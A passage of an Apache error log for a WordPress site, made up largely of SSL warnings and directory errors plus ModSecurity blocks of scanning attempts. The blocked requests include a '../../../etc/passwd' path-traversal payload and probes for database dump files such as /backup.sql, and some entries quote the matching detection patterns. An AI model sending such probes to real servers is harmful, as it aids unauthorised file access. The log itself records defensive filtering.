"OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBjjIlvsEW_WuzYSE224bgAAAMg"] [Tue Mar 21 01:40:19.813778 2023] [autoindex:error] [pid 24377:tid 140695587243776] [client 20.26.194.244:39466] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Mar 21 03:44:22.668720 2023] [ssl:warn] [pid 3605:tid 140328807049088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 21 03:44:22.779555 2023] [ssl:warn] [pid 3606:tid 140328807049088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 21 03:44:23.275297 2023] [ssl:warn] [pid 3606:tid 140328807049088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 21 03:44:24.714256 2023] [ssl:warn] [pid 3606:tid 140328807049088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 21 03:44:26.964522 2023] [ssl:warn] [pid 4052:tid 139642313680768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 21 03:44:27.073001 2023] [ssl:warn] [pid 4053:tid 139642313680768] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 21 08:23:58.234888 2023] [:error] [pid 4293:tid 139641961293568] [client 5.188.62.174:59204] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBmv7pO41JwX0l_krw6XZgAAAMw"] [Tue Mar 21 19:22:33.910426 2023] [:error] [pid 4293:tid 139641902544640] [client 67.223.119.150:60758] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php, referer: http://simplesite.com [Tue Mar 21 19:46:45.109368 2023] [autoindex:error] [pid 4293:tid 139642099488512] [client 20.0.249.226:33774] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Mar 21 22:51:57.596712 2023] [autoindex:error] [pid 4293:tid 139642099488512] [client 5.161.150.214:43334] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Mar 22 03:27:21.400239 2023] [ssl:warn] [pid 12632:tid 140246066489216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 22 03:27:21.524770 2023] [ssl:warn] [pid 12633:tid 140246066489216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 22 03:27:21.862328 2023] [ssl:warn] [pid 12633:tid 140246066489216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 22 03:27:25.017245 2023] [ssl:warn] [pid 12633:tid 140246066489216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 22 03:27:28.568383 2023] [ssl:warn] [pid 13166:tid 139777924982656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 22 03:27:28.681512 2023] [ssl:warn] [pid 13168:tid 139777924982656] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 22 10:09:04.923585 2023] [autoindex:error] [pid 13648:tid 139777479202560] [client 167.71.208.152:42174] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Wed Mar 22 12:04:42.959386 2023] [autoindex:error] [pid 13189:tid 139777563129600] [client 20.127.135.254:47606] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Mar 22 15:33:04.139860 2023] [autoindex:error] [pid 13189:tid 139777504380672] [client 192.185.4.160:56488] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Wed Mar 22 15:40:48.444635 2023] [autoindex:error] [pid 13190:tid 139777571522304] [client 43.153.105.59:56730] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Mar 22 20:27:59.420918 2023] [:error] [pid 13190:tid 139777537951488] [client 91.107.203.112:40008] [client 91.107.203.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:local-download. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:local-download: ../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "ZBurH8U4D7wp-CFKmoNYDwAAAJA"], referer: www.google.com [Thu Mar 23 03:32:32.613113 2023] [autoindex:error] [pid 13648:tid 139777727575808] [client 51.79.231.79:56356] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Thu Mar 23 03:40:20.770770 2023] [ssl:warn] [pid 23830:tid 139873835542400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 23 03:40:20.907458 2023] [ssl:warn] [pid 23831:tid 139873835542400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 23 03:40:21.273670 2023] [ssl:warn] [pid 23831:tid 139873835542400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 23 03:40:22.983825 2023] [ssl:warn] [pid 23831:tid 139873835542400] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 23 03:40:25.296446 2023] [ssl:warn] [pid 24335:tid 140514020390784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 23 03:40:25.406691 2023] [ssl:warn] [pid 24336:tid 140514020390784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Mar 23 12:18:08.873513 2023] [autoindex:error] [pid 24564:tid 140513713829632] [client 66.97.45.248:52280] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Thu Mar 23 20:40:29.599242 2023] [autoindex:error] [pid 24354:tid 140513596331776] [client 20.198.78.255:52520] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 24 03:15:21.149018 2023] [ssl:warn] [pid 8363:tid 140283657303936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 24 03:15:21.274255 2023] [ssl:warn] [pid 8364:tid 140283657303936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 24 03:15:21.754240 2023] [ssl:warn] [pid 8364:tid 140283657303936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 24 03:15:25.396809 2023] [ssl:warn] [pid 8364:tid 140283657303936] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 24 03:15:27.707754 2023] [ssl:warn] [pid 8781:tid 140637479016320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 24 03:15:27.842656 2023] [ssl:warn] [pid 8782:tid 140637479016320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 24 10:20:39.114871 2023] [autoindex:error] [pid 8803:tid 140637194139392] [client 20.122.10.105:38248] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 24 12:16:27.215388 2023] [autoindex:error] [pid 9022:tid 140637051463424] [client 20.117.129.228:43128] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 24 16:57:31.008668 2023] [autoindex:error] [pid 8802:tid 140637210924800] [client 49.51.182.226:55602] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Mar 24 22:49:48.696763 2023] [ssl:warn] [pid 8782:tid 140637479016320] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 25 03:18:19.768652 2023] [ssl:warn] [pid 24165:tid 139902103119744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 25 03:18:19.912249 2023] [ssl:warn] [pid 24166:tid 139902103119744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 25 03:18:20.226828 2023] [ssl:warn] [pid 24166:tid 139902103119744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 25 03:18:22.122548 2023] [ssl:warn] [pid 24166:tid 139902103119744] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 25 03:18:24.406511 2023] [ssl:warn] [pid 24709:tid 139646318344064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Mar 25 03:18:24.531866 2023] [ssl:warn] [pid 24710:tid 139646318344064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 26 03:19:13.051811 2023] [ssl:warn] [pid 1072:tid 139893662586752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 26 03:19:13.164527 2023] [ssl:warn] [pid 1073:tid 139893662586752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 26 03:19:13.642458 2023] [ssl:warn] [pid 1073:tid 139893662586752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 26 03:19:16.662245 2023] [ssl:warn] [pid 1073:tid 139893662586752] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 26 03:19:18.973488 2023] [ssl:warn] [pid 1537:tid 140176268064640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 26 03:19:19.099881 2023] [ssl:warn] [pid 1538:tid 140176268064640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 26 13:33:49.105006 2023] [:error] [pid 1564:tid 140175845811968] [client 220.135.201.122:36164] [client 220.135.201.122] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZCCQDeP6JqU3vP_moOYWzgAAAJQ"] [Sun Mar 26 17:08:46.785144 2023] [:error] [pid 1564:tid 140175904560896] [client 146.115.146.97:47336] [client 146.115.146.97] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "ZCDCbuP6JqU3vP_moOYbegAAAI0"] [Sun Mar 26 20:47:54.243697 2023] [:error] [pid 2220:tid 140175904560896] [client 59.148.249.146:58282] [client 59.148.249.146] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/dump.sql"] [unique_id "ZCD1yq7R8el0Ip7rUbelAgAAAM0"] [Sun Mar 26 21:33:36.376114 2023] [:error] [pid 2220:tid 140175938131712] [client 108.174.2.216:60630] [client 108.174.2.216] ModSecurity: Access denied with code 403 (phase 2). String match within "/Proxy-Connection/ /Lock-Token/ /Content-Range/ /Translate/ /via/ /if/" at TX:header_name. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "100"] [id "960038"] [rev "2"] [msg "HTTP header is restricted by policy"] [data "/Proxy-Connection/"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/HEADER_RESTRICTED"] [tag "OWASP_CRS/POLICY/FILES_NOT_ALLOWED"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/12.1"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZCEAgK7R8el0Ip7rUbemgwAAAMk"] [Sun Mar 26 21:33:36.432107 2023] [:error] [pid 2220:tid 140175820633856] [client 108.174.2.216:60632] [client 108.174.2.216] ModSecurity: Access denied with code 403 (phase 2). String match within "/Proxy-Connection/ /Lock-Token/ /Content-Range/ /Translate/ /via/ /if/" at TX:header_name. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "100"] [id "960038"] [rev "2"] [msg "HTTP header is restricted by policy"] [data "/Proxy-Connection/"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/HEADER_RESTRICTED"] [tag "OWASP_CRS/POLICY/FILES_NOT_ALLOWED"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/12.1"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZCEAgK7R8el0Ip7rUbemhAAAANc"] [Mon Mar 27 00:23:57.616308 2023] [:error] [pid 1562:tid 140175879382784] [client 118.40.155.246:41992] [client 118.40.155.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/test.sql"] [unique_id "ZCEobTT0_z-o9uSMj-mITQAAABA"] [Mon Mar 27 02:25:44.834460 2023] [autoindex:error] [pid 1563:tid 140175862597376] [client 51.142.88.19:48374] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Mar 27 03:18:17.393343 2023] [ssl:warn] [pid 29332:tid 139915692214144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 27 03:18:17.515054 2023] [ssl:warn] [pid 29333:tid 139915692214144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 27 03:18:17.735154 2023] [ssl:warn] [pid 29333:tid 139915692214144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 27 03:18:19.288339 2023] [ssl:warn] [pid 29333:tid 139915692214144] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 27 03:18:21.546771 2023] [ssl:warn] [pid 29783:tid 140228619024256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 27 03:18:21.659744 2023] [ssl:warn] [pid 29784:tid 140228619024256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 27 04:04:46.237681 2023] [:error] [pid 29803:tid 140228266260224] [client 125.227.146.67:53846] [client 125.227.146.67] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/test.sql"] [unique_id "ZCFcLm5va5aRJLF4jGoGPwAAAAw"] [Mon Mar 27 06:38:48.139889 2023] [autoindex:error] [pid 30225:tid 140228215904000] [client 43.134.46.76:35004] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Mar 27 07:41:25.857678 2023] [:error] [pid 29803:tid 140228266260224] [client 14.33.143.98:38200] [client 14.33.143.98] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/mysqldump.sql"] [unique_id "ZCGO9W5va5aRJLF4jGoIxQAAAAw"] [Mon Mar 27 11:24:10.559922 2023] [:error] [pid 30225:tid 140228274652928] [client 46.140.86.202:50534] [client 46.140.86.202] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/mysqldump.sql"] [unique_id "ZCHDKimSIAY2KUMNqz-pegAAAMs"] [Mon Mar 27 15:00:03.368900 2023] [:error] [pid 30225:tid 140228173940480] [client 211.104.142.21:44240] [client 211.104.142.21] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/mysql.sql"] [unique_id "ZCH1wymSIAY2KUMNqz-xKgAAANc"] [Mon Mar 27 